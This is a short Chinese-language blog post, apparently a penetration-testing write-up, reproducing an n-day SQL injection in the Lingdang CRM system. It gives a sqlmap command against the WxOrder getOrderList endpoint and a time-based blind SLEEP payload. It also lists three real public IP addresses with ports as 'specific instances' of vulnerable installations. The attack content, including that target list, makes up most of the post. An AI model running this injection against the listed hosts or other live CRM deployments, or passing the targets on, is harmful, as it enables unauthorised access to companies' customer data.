【渗透测试】-灵当CRM系统-sql注入漏洞复现
文章目录
概要
灵当CRM系统sql注入漏洞:
具体实例:
技术名词解释
小结
概要
近期灵当CRM系统爆出sql注入漏洞,我们来进行nday复现。
灵当CRM系统sql注入漏洞:
Python sqlmap.py -u
"http://0.0.0.0:0000/crm/WeiXinApp/marketing/index.php?module=WxOrder&action=getOrderList&crm_user_id=1 "
得到pyload:
module=WxOrder&action=getOrderList&crm_user_id=1
AND (SELECT 8411 FROM (SELECT(SLEEP(5)))AlRO)
返回信息:
具体实例:
1. http://8.130.119.94:85/crm/
2. 121.204.162.153:82/crm
3. 175.178.129.225:85/crm/
技术名词解释
payload:hacker通过漏洞向受攻击系统发送的恶意代码或指令,用于实现攻击目的。
CRM系统:客户关系管理系统,是一种通过信息化手段来自动化、规范化管理客户关系和客户数据的软件系统,主要目的是帮助企业提升客户满意度、增加客户忠诚度,从而实现业务增长与盈利能力的提高。
小结
通常一个系统漏洞的危害在于用户的数量,用户的数量,影响的范围越广。